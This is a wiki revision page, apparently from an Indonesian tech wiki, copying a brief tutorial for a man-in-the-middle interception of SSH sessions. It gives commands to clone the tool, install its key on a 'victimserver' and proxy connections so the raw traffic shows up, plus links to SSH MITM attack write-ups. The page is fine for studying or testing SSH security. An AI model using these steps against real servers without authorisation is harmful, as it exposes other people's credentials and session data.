MITM: mitmssh: Difference between revisions
From OnnoCenterWiki
Jump to navigationJump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) No edit summary |
||
| (3 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
sumber: https:// | sumber: https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/ | ||
# Download mitmproxy | |||
git clone https://github.com/mitmproxy/mitmproxy.git | |||
#Generate mitm keys (these go to ~/.mitmkeys) | |||
./mitmkeys | |||
Now you want to install the SSH key you just generated to the server you want to mitm. | |||
#Install SSH key | |||
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver | |||
Then run the proxy, pointing it at the victimserver. | |||
#Run proxy | |||
./mitmproxy_ssh -H victimserver | |||
This runs the proxy on localhost:2222 | |||
Now simply connect to the local proxy: | |||
ssh localhost -p 2222 | |||
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh. | |||
==Referensi== | ==Referensi== | ||
* https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/ | |||
* https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/ | * https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/ | ||
* https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py | * https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py | ||
* http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/ | * http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/ | ||
Latest revision as of 02:31, 3 October 2018
sumber: https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/
# Download mitmproxy git clone https://github.com/mitmproxy/mitmproxy.git
#Generate mitm keys (these go to ~/.mitmkeys) ./mitmkeys
Now you want to install the SSH key you just generated to the server you want to mitm.
#Install SSH key ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
Then run the proxy, pointing it at the victimserver.
#Run proxy ./mitmproxy_ssh -H victimserver
This runs the proxy on localhost:2222
Now simply connect to the local proxy:
ssh localhost -p 2222
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.